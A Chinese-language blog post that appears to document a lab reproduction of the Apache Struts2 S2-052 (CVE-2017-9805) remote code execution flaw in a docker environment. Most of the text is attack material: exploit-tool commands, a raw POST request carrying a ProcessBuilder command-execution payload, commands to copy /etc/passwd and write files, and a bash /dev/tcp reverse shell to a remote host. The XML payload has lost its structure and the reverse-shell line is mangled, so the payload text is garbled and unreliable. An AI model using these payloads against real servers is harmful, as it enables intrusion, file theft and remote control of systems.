S2-052 漏洞复现

Structs2框架已知的漏洞编号如下:
  • S2-005
  • S2-009
  • S2-016 (含S2-013)
  • S2-019
  • S2-020
  • S2-021
  • S2-032
  • S2-037(含S2-033)
  • DevMode
  • S2-045
  • S2-046
  • S2-048
  • S2-052
  • S2-055
  • S2-057
 
S2-052( CVE-2017-9805)环境:
https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-052
 
访问 http://你的 IP 地址:端口号/
漏洞poc检测与利用
poc下载:
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
检测到漏洞存在:
python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'
漏洞利用写入文件
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
 
POST /orders/3 HTTP/1.1
Host: 192.168.190.135:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 2415
Connection: close
Referer: http://192.168.190.135:8080/orders/3/edit
Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0
Upgrade-Insecure-Requests: 1
DNT: 1
 
0
false
0
touch
/tmp/success
false
java.lang.ProcessBuilder
start
foo
foo
false
0
0
false
false
0
 
 
 
 
以上数据包成功执行的话,会在docker容器内创建文件/tmp/success,
执行docker-compose exec struts2 ls /tmp/即可看到。
docker-compose exec struts2 ls /tmp/
读文件:
cp /etc/passwd /tmp/passwd
 
写文件:
bash
-c
echo micr067 > /tmp/test.txt
反弹shell:
bash -c bash -i >&; /dev/tcp/192.168.190.130/1521 0>&;1
 
参考链接:
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md
 
 

你可能感兴趣的:(S2-052 漏洞复现)